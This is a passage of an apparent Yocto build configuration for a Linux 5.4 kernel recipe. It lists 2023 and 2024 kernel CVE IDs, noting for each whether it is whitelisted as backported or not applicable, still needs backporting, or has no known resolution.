8439CVE_CHECK_WHITELIST += "CVE-2023-52524"
8440
8441# fixed-version: only affects 6.6rc1 onwards
8442CVE_CHECK_WHITELIST += "CVE-2023-52525"
8443
8444# fixed-version: only affects 6.1rc1 onwards
8445CVE_CHECK_WHITELIST += "CVE-2023-52526"
8446
8447# cpe-stable-backport: Backported in 5.4.258
8448CVE_CHECK_WHITELIST += "CVE-2023-52527"
8449
8450# cpe-stable-backport: Backported in 5.4.258
8451CVE_CHECK_WHITELIST += "CVE-2023-52528"
8452
8453# fixed-version: only affects 5.14rc1 onwards
8454CVE_CHECK_WHITELIST += "CVE-2023-52529"
8455
8456# CVE-2023-52530 needs backporting (fixed from 6.6rc5)
8457
8458# CVE-2023-52531 needs backporting (fixed from 6.6rc5)
8459
8460# CVE-2023-52532 needs backporting (fixed from 6.6rc5)
8461
8462# CVE-2023-52559 needs backporting (fixed from 6.6rc5)
8463
8464# fixed-version: only affects 5.16rc5 onwards
8465CVE_CHECK_WHITELIST += "CVE-2023-52560"
8466
8467# CVE-2023-52561 needs backporting (fixed from 6.6rc1)
8468
8469# fixed-version: only affects 6.0rc4 onwards
8470CVE_CHECK_WHITELIST += "CVE-2023-52562"
8471
8472# CVE-2023-52563 needs backporting (fixed from 6.6rc3)
8473
8474# fixed-version: only affects 6.5rc4 onwards
8475CVE_CHECK_WHITELIST += "CVE-2023-52564"
8476
8477# CVE-2023-52565 needs backporting (fixed from 6.6rc3)
8478
8479# cpe-stable-backport: Backported in 5.4.258
8480CVE_CHECK_WHITELIST += "CVE-2023-52566"
8481
8482# fixed-version: only affects 6.4rc1 onwards
8483CVE_CHECK_WHITELIST += "CVE-2023-52567"
8484
8485# CVE-2023-52568 needs backporting (fixed from 6.6rc4)
8486
8487# CVE-2023-52569 needs backporting (fixed from 6.6rc2)
8488
8489# fixed-version: only affects 6.1rc1 onwards
8490CVE_CHECK_WHITELIST += "CVE-2023-52570"
8491
8492# CVE-2023-52571 needs backporting (fixed from 6.6rc4)
8493
8494# CVE-2023-52572 needs backporting (fixed from 6.6rc3)
8495
8496# cpe-stable-backport: Backported in 5.4.258
8497CVE_CHECK_WHITELIST += "CVE-2023-52573"
8498
8499# cpe-stable-backport: Backported in 5.4.258
8500CVE_CHECK_WHITELIST += "CVE-2023-52574"
8501
8502# fixed-version: only affects 6.5rc6 onwards
8503CVE_CHECK_WHITELIST += "CVE-2023-52575"
8504
8505# fixed-version: only affects 5.13rc1 onwards
8506CVE_CHECK_WHITELIST += "CVE-2023-52576"
8507
8508# fixed-version: only affects 6.6rc1 onwards
8509CVE_CHECK_WHITELIST += "CVE-2023-52577"
8510
8511# cpe-stable-backport: Backported in 5.4.258
8512CVE_CHECK_WHITELIST += "CVE-2023-52578"
8513
8514# fixed-version: only affects 5.12rc1 onwards
8515CVE_CHECK_WHITELIST += "CVE-2023-52580"
8516
8517# fixed-version: only affects 6.5rc6 onwards
8518CVE_CHECK_WHITELIST += "CVE-2023-52581"
8519
8520# fixed-version: only affects 5.13rc1 onwards
8521CVE_CHECK_WHITELIST += "CVE-2023-52582"
8522
8523# cpe-stable-backport: Backported in 5.4.269
8524CVE_CHECK_WHITELIST += "CVE-2023-52583"
8525
8526# CVE-2023-52584 needs backporting (fixed from 6.8rc1)
8527
8528# CVE-2023-52585 needs backporting (fixed from 6.8rc1)
8529
8530# CVE-2023-52586 needs backporting (fixed from 6.8rc1)
8531
8532# cpe-stable-backport: Backported in 5.4.269
8533CVE_CHECK_WHITELIST += "CVE-2023-52587"
8534
8535# CVE-2023-52588 needs backporting (fixed from 6.8rc1)
8536
8537# CVE-2023-52589 needs backporting (fixed from 6.8rc1)
8538
8539# CVE-2023-52590 needs backporting (fixed from 6.8rc1)
8540
8541# CVE-2023-52591 needs backporting (fixed from 6.8rc1)
8542
8543# CVE-2023-52593 needs backporting (fixed from 6.8rc1)
8544
8545# cpe-stable-backport: Backported in 5.4.269
8546CVE_CHECK_WHITELIST += "CVE-2023-52594"
8547
8548# cpe-stable-backport: Backported in 5.4.269
8549CVE_CHECK_WHITELIST += "CVE-2023-52595"
8550
8551# CVE-2023-52596 needs backporting (fixed from 6.8rc1)
8552
8553# cpe-stable-backport: Backported in 5.4.269
8554CVE_CHECK_WHITELIST += "CVE-2023-52597"
8555
8556# cpe-stable-backport: Backported in 5.4.269
8557CVE_CHECK_WHITELIST += "CVE-2023-52598"
8558
8559# cpe-stable-backport: Backported in 5.4.269
8560CVE_CHECK_WHITELIST += "CVE-2023-52599"
8561
8562# cpe-stable-backport: Backported in 5.4.269
8563CVE_CHECK_WHITELIST += "CVE-2023-52600"
8564
8565# cpe-stable-backport: Backported in 5.4.269
8566CVE_CHECK_WHITELIST += "CVE-2023-52601"
8567
8568# cpe-stable-backport: Backported in 5.4.269
8569CVE_CHECK_WHITELIST += "CVE-2023-52602"
8570
8571# cpe-stable-backport: Backported in 5.4.269
8572CVE_CHECK_WHITELIST += "CVE-2023-52603"
8573
8574# cpe-stable-backport: Backported in 5.4.269
8575CVE_CHECK_WHITELIST += "CVE-2023-52604"
8576
8577# cpe-stable-backport: Backported in 5.4.269
8578CVE_CHECK_WHITELIST += "CVE-2023-52606"
8579
8580# cpe-stable-backport: Backported in 5.4.269
8581CVE_CHECK_WHITELIST += "CVE-2023-52607"
8582
8583# fixed-version: only affects 5.7rc1 onwards
8584CVE_CHECK_WHITELIST += "CVE-2023-52608"
8585
8586# cpe-stable-backport: Backported in 5.4.268
8587CVE_CHECK_WHITELIST += "CVE-2023-52609"
8588
8589# CVE-2023-52610 needs backporting (fixed from 6.8rc1)
8590
8591# fixed-version: only affects 6.4rc1 onwards
8592CVE_CHECK_WHITELIST += "CVE-2023-52611"
8593
8594# cpe-stable-backport: Backported in 5.4.268
8595CVE_CHECK_WHITELIST += "CVE-2023-52612"
8596
8597# fixed-version: only affects 6.6rc1 onwards
8598CVE_CHECK_WHITELIST += "CVE-2023-52613"
8599
8600# CVE-2023-52614 needs backporting (fixed from 6.8rc1)
8601
8602# cpe-stable-backport: Backported in 5.4.269
8603CVE_CHECK_WHITELIST += "CVE-2023-52615"
8604
8605# fixed-version: only affects 5.10rc1 onwards
8606CVE_CHECK_WHITELIST += "CVE-2023-52616"
8607
8608# cpe-stable-backport: Backported in 5.4.269
8609CVE_CHECK_WHITELIST += "CVE-2023-52617"
8610
8611# CVE-2023-52618 needs backporting (fixed from 6.8rc1)
8612
8613# cpe-stable-backport: Backported in 5.4.269
8614CVE_CHECK_WHITELIST += "CVE-2023-52619"
8615
8616# CVE-2023-52620 needs backporting (fixed from 6.4)
8617
8618# CVE-2023-52621 needs backporting (fixed from 6.8rc1)
8619
8620# cpe-stable-backport: Backported in 5.4.269
8621CVE_CHECK_WHITELIST += "CVE-2023-52622"
8622
8623# cpe-stable-backport: Backported in 5.4.269
8624CVE_CHECK_WHITELIST += "CVE-2023-52623"
8625
8626# CVE-2023-52624 needs backporting (fixed from 6.8rc1)
8627
8628# CVE-2023-52625 needs backporting (fixed from 6.8rc1)
8629
8630# fixed-version: only affects 6.7rc2 onwards
8631CVE_CHECK_WHITELIST += "CVE-2023-52626"
8632
8633# fixed-version: only affects 5.6rc1 onwards
8634CVE_CHECK_WHITELIST += "CVE-2023-52627"
8635
8636# CVE-2023-52628 needs backporting (fixed from 6.6rc1)
8637
8638# CVE-2023-52629 needs backporting (fixed from 6.6rc1)
8639
8640# fixed-version: only affects 5.10rc1 onwards
8641CVE_CHECK_WHITELIST += "CVE-2023-52630"
8642
8643# fixed-version: only affects 5.15rc1 onwards
8644CVE_CHECK_WHITELIST += "CVE-2023-52631"
8645
8646# CVE-2023-52632 needs backporting (fixed from 6.8rc1)
8647
8648# CVE-2023-52633 needs backporting (fixed from 6.8rc1)
8649
8650# CVE-2023-52634 needs backporting (fixed from 6.8rc1)
8651
8652# CVE-2023-52635 needs backporting (fixed from 6.8rc1)
8653
8654# fixed-version: only affects 6.6rc1 onwards
8655CVE_CHECK_WHITELIST += "CVE-2023-52636"
8656
8657# cpe-stable-backport: Backported in 5.4.269
8658CVE_CHECK_WHITELIST += "CVE-2023-52637"
8659
8660# CVE-2023-52638 needs backporting (fixed from 6.8rc5)
8661
8662# CVE-2023-52639 needs backporting (fixed from 6.8rc4)
8663
8664# CVE-2023-52640 needs backporting (fixed from 6.8rc4)
8665
8666# CVE-2023-52641 needs backporting (fixed from 6.8rc4)
8667
8668# fixed-version: only affects 6.1rc1 onwards
8669CVE_CHECK_WHITELIST += "CVE-2023-5345"
8670
8671# fixed-version: only affects 6.2 onwards
8672CVE_CHECK_WHITELIST += "CVE-2023-5633"
8673
8674# cpe-stable-backport: Backported in 5.4.259
8675CVE_CHECK_WHITELIST += "CVE-2023-5717"
8676
8677# fixed-version: only affects 6.2rc1 onwards
8678CVE_CHECK_WHITELIST += "CVE-2023-5972"
8679
8680# fixed-version: only affects 5.15rc1 onwards
8681CVE_CHECK_WHITELIST += "CVE-2023-6039"
8682
8683# cpe-stable-backport: Backported in 5.4.267
8684CVE_CHECK_WHITELIST += "CVE-2023-6040"
8685
8686# fixed-version: only affects 6.6rc3 onwards
8687CVE_CHECK_WHITELIST += "CVE-2023-6111"
8688
8689# cpe-stable-backport: Backported in 5.4.263
8690CVE_CHECK_WHITELIST += "CVE-2023-6121"
8691
8692# fixed-version: only affects 5.7rc7 onwards
8693CVE_CHECK_WHITELIST += "CVE-2023-6176"
8694
8695# fixed-version: only affects 6.6rc1 onwards
8696CVE_CHECK_WHITELIST += "CVE-2023-6200"
8697
8698# CVE-2023-6238 has no known resolution
8699
8700# CVE-2023-6240 has no known resolution
8701
8702# cpe-stable-backport: Backported in 5.4.273
8703CVE_CHECK_WHITELIST += "CVE-2023-6270"
8704
8705# cpe-stable-backport: Backported in 5.4.268
8706CVE_CHECK_WHITELIST += "CVE-2023-6356"
8707
8708# fixed-version: only affects 6.1rc1 onwards
8709CVE_CHECK_WHITELIST += "CVE-2023-6531"
8710
8711# CVE-2023-6535 has no known resolution
8712
8713# cpe-stable-backport: Backported in 5.4.268
8714CVE_CHECK_WHITELIST += "CVE-2023-6536"
8715
8716# CVE-2023-6546 needs backporting (fixed from 6.5rc7)
8717
8718# CVE-2023-6560 needs backporting (fixed from 6.7rc4)
8719
8720# cpe-stable-backport: Backported in 5.4.266
8721CVE_CHECK_WHITELIST += "CVE-2023-6606"
8722
8723# CVE-2023-6610 needs backporting (fixed from 6.7rc7)
8724
8725# fixed-version: only affects 5.11rc1 onwards
8726CVE_CHECK_WHITELIST += "CVE-2023-6622"
8727
8728# fixed-version: only affects 6.7rc1 onwards
8729CVE_CHECK_WHITELIST += "CVE-2023-6679"
8730
8731# fixed-version: only affects 5.6rc1 onwards
8732CVE_CHECK_WHITELIST += "CVE-2023-6817"
8733
8734# cpe-stable-backport: Backported in 5.4.268
8735CVE_CHECK_WHITELIST += "CVE-2023-6915"
8736
8737# cpe-stable-backport: Backported in 5.4.264
8738CVE_CHECK_WHITELIST += "CVE-2023-6931"
8739
8740# cpe-stable-backport: Backported in 5.4.263
8741CVE_CHECK_WHITELIST += "CVE-2023-6932"
8742
8743# cpe-stable-backport: Backported in 5.4.273
8744CVE_CHECK_WHITELIST += "CVE-2023-7042"
8745
8746# cpe-stable-backport: Backported in 5.4.235
8747CVE_CHECK_WHITELIST += "CVE-2023-7192"
8748
8749# fixed-version: only affects 6.5rc6 onwards
8750CVE_CHECK_WHITELIST += "CVE-2024-0193"
8751
8752# cpe-stable-backport: Backported in 5.4.269
8753CVE_CHECK_WHITELIST += "CVE-2024-0340"
8754
8755# fixed-version: only affects 6.2rc1 onwards
8756CVE_CHECK_WHITELIST += "CVE-2024-0443"
8757
8758# fixed-version: only affects 5.15rc1 onwards
8759CVE_CHECK_WHITELIST += "CVE-2024-0562"
8760
8761# CVE-2024-0564 has no known resolution
8762
8763# CVE-2024-0565 needs backporting (fixed from 6.7rc6)
8764
8765# fixed-version: only affects 6.4rc1 onwards
8766CVE_CHECK_WHITELIST += "CVE-2024-0582"
8767
8768# cpe-stable-backport: Backported in 5.4.263
8769CVE_CHECK_WHITELIST += "CVE-2024-0584"
8770
8771# cpe-stable-backport: Backported in 5.4.269
8772CVE_CHECK_WHITELIST += "CVE-2024-0607"
8773
8774# fixed-version: only affects 5.13rc1 onwards
8775CVE_CHECK_WHITELIST += "CVE-2024-0639"
8776
8777# fixed-version: only affects 5.5rc1 onwards
8778CVE_CHECK_WHITELIST += "CVE-2024-0641"
8779
8780# cpe-stable-backport: Backported in 5.4.267
8781CVE_CHECK_WHITELIST += "CVE-2024-0646"
8782
8783# cpe-stable-backport: Backported in 5.4.243
8784CVE_CHECK_WHITELIST += "CVE-2024-0775"
8785
8786# cpe-stable-backport: Backported in 5.4.271
8787CVE_CHECK_WHITELIST += "CVE-2024-0841"
8788
8789# fixed-version: only affects 5.13rc1 onwards
8790CVE_CHECK_WHITELIST += "CVE-2024-1085"
8791
8792# cpe-stable-backport: Backported in 5.4.269
8793CVE_CHECK_WHITELIST += "CVE-2024-1086"
8794
8795# CVE-2024-1151 needs backporting (fixed from 6.8rc5)
8796
8797# CVE-2024-1312 needs backporting (fixed from 6.5rc4)
8798
8799# CVE-2024-21803 has no known resolution
8800
8801# CVE-2024-2193 has no known resolution
8802
8803# cpe-stable-backport: Backported in 5.4.273
8804CVE_CHECK_WHITELIST += "CVE-2024-22099"
8805
8806# CVE-2024-22386 has no known resolution
8807
8808# fixed-version: only affects 5.15rc1 onwards
8809CVE_CHECK_WHITELIST += "CVE-2024-22705"
8810
8811# cpe-stable-backport: Backported in 5.4.255
8812CVE_CHECK_WHITELIST += "CVE-2024-23196"
8813
8814# CVE-2024-23307 needs backporting (fixed from 6.9rc1)
8815
8816# CVE-2024-23848 has no known resolution
8817
8818# cpe-stable-backport: Backported in 5.4.269
8819CVE_CHECK_WHITELIST += "CVE-2024-23849"
8820
8821# fixed-version: only affects 5.9rc1 onwards
8822CVE_CHECK_WHITELIST += "CVE-2024-23850"
8823
8824# CVE-2024-23851 needs backporting (fixed from 6.8rc3)
8825
8826# CVE-2024-24855 needs backporting (fixed from 6.5rc2)
8827
8828# CVE-2024-24857 has no known resolution
8829
8830# CVE-2024-24858 has no known resolution
8831
8832# CVE-2024-24859 has no known resolution
8833
8834# CVE-2024-24860 needs backporting (fixed from 6.8rc1)
8835
8836# CVE-2024-24861 needs backporting (fixed from 6.9rc1)
8837
8838# CVE-2024-24864 has no known resolution
8839
8840# CVE-2024-25739 has no known resolution
8841
8842# CVE-2024-25740 has no known resolution
8843
8844# CVE-2024-25741 has no known resolution
8845
8846# CVE-2024-25744 needs backporting (fixed from 6.7rc5)
8847
8848# fixed-version: only affects 6.5rc4 onwards
8849CVE_CHECK_WHITELIST += "CVE-2024-26581"
8850
8851# fixed-version: only affects 6.0rc1 onwards
8852CVE_CHECK_WHITELIST += "CVE-2024-26582"
8853
8854# fixed-version: only affects 5.7 onwards
8855CVE_CHECK_WHITELIST += "CVE-2024-26583"
8856
8857# CVE-2024-26584 needs backporting (fixed from 6.8rc5)
8858
8859# CVE-2024-26585 needs backporting (fixed from 6.8rc5)
8860
8861# CVE-2024-26586 needs backporting (fixed from 6.8rc1)
8862
8863# fixed-version: only affects 6.6rc1 onwards
8864CVE_CHECK_WHITELIST += "CVE-2024-26587"
8865
8866# fixed-version: only affects 6.1rc3 onwards
8867CVE_CHECK_WHITELIST += "CVE-2024-26588"
8868
8869# CVE-2024-26589 needs backporting (fixed from 6.8rc1)
8870
8871# fixed-version: only affects 5.16rc1 onwards
8872CVE_CHECK_WHITELIST += "CVE-2024-26590"
8873
8874# fixed-version: only affects 5.13rc1 onwards
8875CVE_CHECK_WHITELIST += "CVE-2024-26591"
8876
8877# CVE-2024-26592 needs backporting (fixed from 6.8rc1)
8878
8879# cpe-stable-backport: Backported in 5.4.269
8880CVE_CHECK_WHITELIST += "CVE-2024-26593"
8881
8882# CVE-2024-26594 needs backporting (fixed from 6.8rc1)
8883
8884# CVE-2024-26595 needs backporting (fixed from 6.8rc1)
8885
8886# fixed-version: only affects 6.1rc1 onwards
8887CVE_CHECK_WHITELIST += "CVE-2024-26596"
8888
8889# cpe-stable-backport: Backported in 5.4.268
8890CVE_CHECK_WHITELIST += "CVE-2024-26597"
8891
8892# cpe-stable-backport: Backported in 5.4.269
8893CVE_CHECK_WHITELIST += "CVE-2024-26598"
8894
8895# fixed-version: only affects 5.17rc1 onwards
8896CVE_CHECK_WHITELIST += "CVE-2024-26599"
8897
8898# cpe-stable-backport: Backported in 5.4.269
8899CVE_CHECK_WHITELIST += "CVE-2024-26600"
8900
8901# fixed-version: only affects 5.11rc1 onwards
8902CVE_CHECK_WHITELIST += "CVE-2024-26601"
8903
8904# cpe-stable-backport: Backported in 5.4.269
8905CVE_CHECK_WHITELIST += "CVE-2024-26602"
8906
8907# fixed-version: only affects 5.14rc1 onwards
8908CVE_CHECK_WHITELIST += "CVE-2024-26603"
8909
8910# fixed-version: only affects 6.6rc1 onwards
8911CVE_CHECK_WHITELIST += "CVE-2024-26604"
8912
8913# fixed-version: only affects 6.7 onwards
8914CVE_CHECK_WHITELIST += "CVE-2024-26605"
8915
8916# cpe-stable-backport: Backported in 5.4.269
8917CVE_CHECK_WHITELIST += "CVE-2024-26606"
8918
8919# CVE-2024-26607 needs backporting (fixed from 6.8rc2)
8920
8921# fixed-version: only affects 5.15rc1 onwards
8922CVE_CHECK_WHITELIST += "CVE-2024-26608"
8923
8924# fixed-version: only affects 5.5rc1 onwards
8925CVE_CHECK_WHITELIST += "CVE-2024-26610"
8926
8927# fixed-version: only affects 6.6rc1 onwards
8928CVE_CHECK_WHITELIST += "CVE-2024-26611"
8929
8930# fixed-version: only affects 5.17rc1 onwards
8931CVE_CHECK_WHITELIST += "CVE-2024-26612"
8932
8933# CVE-2024-26614 needs backporting (fixed from 6.8rc2)
8934
8935# cpe-stable-backport: Backported in 5.4.269
8936CVE_CHECK_WHITELIST += "CVE-2024-26615"
8937
8938# fixed-version: only affects 6.4rc1 onwards
8939CVE_CHECK_WHITELIST += "CVE-2024-26616"
8940
8941# fixed-version: only affects 6.7rc1 onwards
8942CVE_CHECK_WHITELIST += "CVE-2024-26617"
8943
8944# fixed-version: only affects 6.5rc7 onwards
8945CVE_CHECK_WHITELIST += "CVE-2024-26618"
8946
8947# fixed-version: only affects 6.7rc5 onwards
8948CVE_CHECK_WHITELIST += "CVE-2024-26619"
8949
8950# fixed-version: only affects 6.0rc1 onwards
8951CVE_CHECK_WHITELIST += "CVE-2024-26620"
8952
8953# fixed-version: only affects 6.7 onwards
8954CVE_CHECK_WHITELIST += "CVE-2024-26621"
8955
8956# CVE-2024-26622 needs backporting (fixed from 6.8rc7)
8957
8958# CVE-2024-26623 needs backporting (fixed from 6.8rc3)
8959
8960# cpe-stable-backport: Backported in 5.4.269
8961CVE_CHECK_WHITELIST += "CVE-2024-26625"
8962
8963# fixed-version: only affects 6.8rc1 onwards
8964CVE_CHECK_WHITELIST += "CVE-2024-26626"
8965
8966# CVE-2024-26627 needs backporting (fixed from 6.8rc3)
8967
8968# fixed-version: only affects 5.19rc1 onwards
8969CVE_CHECK_WHITELIST += "CVE-2024-26629"
8970
8971# fixed-version: only affects 6.5rc1 onwards
8972CVE_CHECK_WHITELIST += "CVE-2024-26630"
8973
8974# fixed-version: only affects 5.13rc1 onwards
8975CVE_CHECK_WHITELIST += "CVE-2024-26631"
8976
8977# fixed-version: only affects 5.17rc1 onwards
8978CVE_CHECK_WHITELIST += "CVE-2024-26632"
8979
8980# cpe-stable-backport: Backported in 5.4.268
8981CVE_CHECK_WHITELIST += "CVE-2024-26633"
8982
8983# fixed-version: only affects 6.6rc7 onwards
8984CVE_CHECK_WHITELIST += "CVE-2024-26634"
8985
8986# cpe-stable-backport: Backported in 5.4.269
8987CVE_CHECK_WHITELIST += "CVE-2024-26635"
8988
8989# cpe-stable-backport: Backported in 5.4.269
8990CVE_CHECK_WHITELIST += "CVE-2024-26636"
8991
8992# fixed-version: only affects 6.7 onwards
8993CVE_CHECK_WHITELIST += "CVE-2024-26637"
8994
8995# fixed-version: only affects 5.19rc1 onwards
8996CVE_CHECK_WHITELIST += "CVE-2024-26638"
8997
8998# fixed-version: only affects 6.8rc1 onwards
8999CVE_CHECK_WHITELIST += "CVE-2024-26639"
9000
9001# CVE-2024-26640 needs backporting (fixed from 6.8rc3)
9002
9003# CVE-2024-26641 needs backporting (fixed from 6.8rc3)
9004
9005# CVE-2024-26642 needs backporting (fixed from 6.8)
9006
9007# fixed-version: only affects 6.5rc6 onwards
9008CVE_CHECK_WHITELIST += "CVE-2024-26643"
9009
9010# CVE-2024-26644 needs backporting (fixed from 6.8rc2)
9011
9012# cpe-stable-backport: Backported in 5.4.269
9013CVE_CHECK_WHITELIST += "CVE-2024-26645"
9014
9015# CVE-2024-26646 needs backporting (fixed from 6.8rc1)
9016
9017# CVE-2024-26647 needs backporting (fixed from 6.8rc1)
9018
9019# CVE-2024-26648 needs backporting (fixed from 6.8rc1)
9020
9021# fixed-version: only affects 6.3rc1 onwards
9022CVE_CHECK_WHITELIST += "CVE-2024-26649"
9023
9024# CVE-2024-26650 needs backporting (fixed from 6.8rc2)
9025
9026# cpe-stable-backport: Backported in 5.4.273
9027CVE_CHECK_WHITELIST += "CVE-2024-26651"
9028
9029# fixed-version: only affects 6.4rc1 onwards
9030CVE_CHECK_WHITELIST += "CVE-2024-26652"
9031
9032# fixed-version: only affects 6.7rc1 onwards
9033CVE_CHECK_WHITELIST += "CVE-2024-26653"
9034
9035# CVE-2024-26654 needs backporting (fixed from 6.9rc2)
9036
9037# CVE-2024-26655 needs backporting (fixed from 6.9rc2)
9038
9039# CVE-2024-26656 needs backporting (fixed from 6.9rc1)
9040
9041# fixed-version: only affects 6.7rc1 onwards
9042CVE_CHECK_WHITELIST += "CVE-2024-26657"
9043
9044# CVE-2024-26658 needs backporting (fixed from 6.8rc1)
9045
9046# CVE-2024-26659 needs backporting (fixed from 6.8rc3)
9047
9048# fixed-version: only affects 5.11rc1 onwards
9049CVE_CHECK_WHITELIST += "CVE-2024-26660"
9050
9051# fixed-version: only affects 5.9rc1 onwards
9052CVE_CHECK_WHITELIST += "CVE-2024-26661"
9053
9054# fixed-version: only affects 5.9rc1 onwards
9055CVE_CHECK_WHITELIST += "CVE-2024-26662"
9056
9057# cpe-stable-backport: Backported in 5.4.269
9058CVE_CHECK_WHITELIST += "CVE-2024-26663"
9059
9060# cpe-stable-backport: Backported in 5.4.269
9061CVE_CHECK_WHITELIST += "CVE-2024-26664"
9062
9063# fixed-version: only affects 5.9rc1 onwards
9064CVE_CHECK_WHITELIST += "CVE-2024-26665"
9065
9066# fixed-version: only affects 6.5rc1 onwards
9067CVE_CHECK_WHITELIST += "CVE-2024-26666"
9068
9069# fixed-version: only affects 5.19rc1 onwards
9070CVE_CHECK_WHITELIST += "CVE-2024-26667"
9071
9072# CVE-2024-26668 needs backporting (fixed from 6.8rc2)
9073
9074# CVE-2024-26669 needs backporting (fixed from 6.8rc2)
9075
9076# fixed-version: only affects 6.6rc5 onwards
9077CVE_CHECK_WHITELIST += "CVE-2024-26670"
9078
9079# cpe-stable-backport: Backported in 5.4.269
9080CVE_CHECK_WHITELIST += "CVE-2024-26671"
9081
9082# CVE-2024-26672 needs backporting (fixed from 6.8rc1)
9083
9084# cpe-stable-backport: Backported in 5.4.269
9085CVE_CHECK_WHITELIST += "CVE-2024-26673"
9086
9087# fixed-version: only affects 6.4rc1 onwards
9088CVE_CHECK_WHITELIST += "CVE-2024-26674"
9089
9090# cpe-stable-backport: Backported in 5.4.269
9091CVE_CHECK_WHITELIST += "CVE-2024-26675"
9092
9093# CVE-2024-26676 needs backporting (fixed from 6.8rc4)
9094
9095# CVE-2024-26677 needs backporting (fixed from 6.8rc4)
9096
9097# fixed-version: only affects 6.7rc1 onwards
9098CVE_CHECK_WHITELIST += "CVE-2024-26678"
9099
9100# cpe-stable-backport: Backported in 5.4.269
9101CVE_CHECK_WHITELIST += "CVE-2024-26679"
9102
9103# fixed-version: only affects 5.5rc1 onwards
9104CVE_CHECK_WHITELIST += "CVE-2024-26680"
9105
9106# fixed-version: only affects 6.0rc1 onwards
9107CVE_CHECK_WHITELIST += "CVE-2024-26681"
9108
9109# fixed-version: only affects 6.7rc1 onwards
9110CVE_CHECK_WHITELIST += "CVE-2024-26682"
9111
9112# fixed-version: only affects 6.7rc1 onwards
9113CVE_CHECK_WHITELIST += "CVE-2024-26683"
9114
9115# cpe-stable-backport: Backported in 5.4.269
9116CVE_CHECK_WHITELIST += "CVE-2024-26684"
9117
9118# cpe-stable-backport: Backported in 5.4.269
9119CVE_CHECK_WHITELIST += "CVE-2024-26685"
9120
9121# CVE-2024-26686 needs backporting (fixed from 6.8rc4)
9122
9123# CVE-2024-26687 needs backporting (fixed from 6.8rc5)
9124
9125# cpe-stable-backport: Backported in 5.4.271
9126CVE_CHECK_WHITELIST += "CVE-2024-26688"
9127
9128# CVE-2024-26689 needs backporting (fixed from 6.8rc4)
9129
9130# fixed-version: only affects 6.6rc1 onwards
9131CVE_CHECK_WHITELIST += "CVE-2024-26690"
9132
9133# CVE-2024-26691 needs backporting (fixed from 6.8rc5)
9134
9135# fixed-version: only affects 6.3rc1 onwards
9136CVE_CHECK_WHITELIST += "CVE-2024-26692"
9137
9138# fixed-version: only affects 6.4rc1 onwards
9139CVE_CHECK_WHITELIST += "CVE-2024-26693"
9140
9141# fixed-version: only affects 6.4rc1 onwards
9142CVE_CHECK_WHITELIST += "CVE-2024-26694"
9143
9144# fixed-version: only affects 6.0rc1 onwards
9145CVE_CHECK_WHITELIST += "CVE-2024-26695"
9146
9147# cpe-stable-backport: Backported in 5.4.269
9148CVE_CHECK_WHITELIST += "CVE-2024-26696"
9149
9150# cpe-stable-backport: Backported in 5.4.269
9151CVE_CHECK_WHITELIST += "CVE-2024-26697"
9152
9153# fixed-version: only affects 5.8rc1 onwards
9154CVE_CHECK_WHITELIST += "CVE-2024-26698"
9155
9156# CVE-2024-26699 needs backporting (fixed from 6.8rc5)
9157
9158# CVE-2024-26700 needs backporting (fixed from 6.8rc4)
9159
9160# cpe-stable-backport: Backported in 5.4.269
9161CVE_CHECK_WHITELIST += "CVE-2024-26702"
9162
9163# fixed-version: only affects 6.5rc1 onwards
9164CVE_CHECK_WHITELIST += "CVE-2024-26703"
9165
9166# cpe-stable-backport: Backported in 5.4.269
9167CVE_CHECK_WHITELIST += "CVE-2024-26704"
9168
9169# fixed-version: only affects 6.6rc2 onwards
9170CVE_CHECK_WHITELIST += "CVE-2024-26705"
9171
9172# CVE-2024-26706 needs backporting (fixed from 6.8rc3)
9173
9174# fixed-version: only affects 5.9rc1 onwards
9175CVE_CHECK_WHITELIST += "CVE-2024-26707"
9176
9177# fixed-version: only affects 6.2rc1 onwards
9178CVE_CHECK_WHITELIST += "CVE-2024-26708"
9179
9180# fixed-version: only affects 6.7rc1 onwards
9181CVE_CHECK_WHITELIST += "CVE-2024-26709"
9182
9183# fixed-version: only affects 6.8rc1 onwards
9184CVE_CHECK_WHITELIST += "CVE-2024-26710"
9185
9186# fixed-version: only affects 6.2rc1 onwards
9187CVE_CHECK_WHITELIST += "CVE-2024-26711"
9188
9189# CVE-2024-26712 needs backporting (fixed from 6.8rc5)
9190
9191# CVE-2024-26713 needs backporting (fixed from 6.8rc5)
9192
9193# fixed-version: only affects 5.15rc1 onwards
9194CVE_CHECK_WHITELIST += "CVE-2024-26714"
9195
9196# CVE-2024-26715 needs backporting (fixed from 6.8rc3)
9197
9198# fixed-version: only affects 6.5rc1 onwards
9199CVE_CHECK_WHITELIST += "CVE-2024-26716"
9200
9201# fixed-version: only affects 5.12rc1 onwards
9202CVE_CHECK_WHITELIST += "CVE-2024-26717"
9203
9204# fixed-version: only affects 5.9rc1 onwards
9205CVE_CHECK_WHITELIST += "CVE-2024-26718"
9206
9207# CVE-2024-26719 needs backporting (fixed from 6.8rc3)
9208
9209# cpe-stable-backport: Backported in 5.4.269
9210CVE_CHECK_WHITELIST += "CVE-2024-26720"
9211
9212# fixed-version: only affects 6.7rc1 onwards
9213CVE_CHECK_WHITELIST += "CVE-2024-26721"
9214
9215# fixed-version: only affects 6.7rc5 onwards
9216CVE_CHECK_WHITELIST += "CVE-2024-26722"
9217
9218# fixed-version: only affects 6.1rc1 onwards
9219CVE_CHECK_WHITELIST += "CVE-2024-26723"
9220
9221# fixed-version: only affects 6.7rc1 onwards
9222CVE_CHECK_WHITELIST += "CVE-2024-26724"
9223
9224# fixed-version: only affects 6.7rc1 onwards
9225CVE_CHECK_WHITELIST += "CVE-2024-26725"
9226
9227# CVE-2024-26726 needs backporting (fixed from 6.8rc5)
9228
9229# fixed-version: only affects 5.9rc1 onwards
9230CVE_CHECK_WHITELIST += "CVE-2024-26727"
9231
9232# fixed-version: only affects 6.7rc1 onwards
9233CVE_CHECK_WHITELIST += "CVE-2024-26728"
9234
9235# fixed-version: only affects 6.7rc1 onwards
9236CVE_CHECK_WHITELIST += "CVE-2024-26729"
9237
9238# fixed-version: only affects 6.6rc1 onwards
9239CVE_CHECK_WHITELIST += "CVE-2024-26730"
9240
9241# fixed-version: only affects 6.4rc4 onwards
9242CVE_CHECK_WHITELIST += "CVE-2024-26731"
9243
9244# fixed-version: only affects 6.7rc1 onwards
9245CVE_CHECK_WHITELIST += "CVE-2024-26732"
9246
9247# CVE-2024-26733 needs backporting (fixed from 6.8rc6)
9248
9249# fixed-version: only affects 6.3rc1 onwards
9250CVE_CHECK_WHITELIST += "CVE-2024-26734"
9251
9252# cpe-stable-backport: Backported in 5.4.270
9253CVE_CHECK_WHITELIST += "CVE-2024-26735"
9254
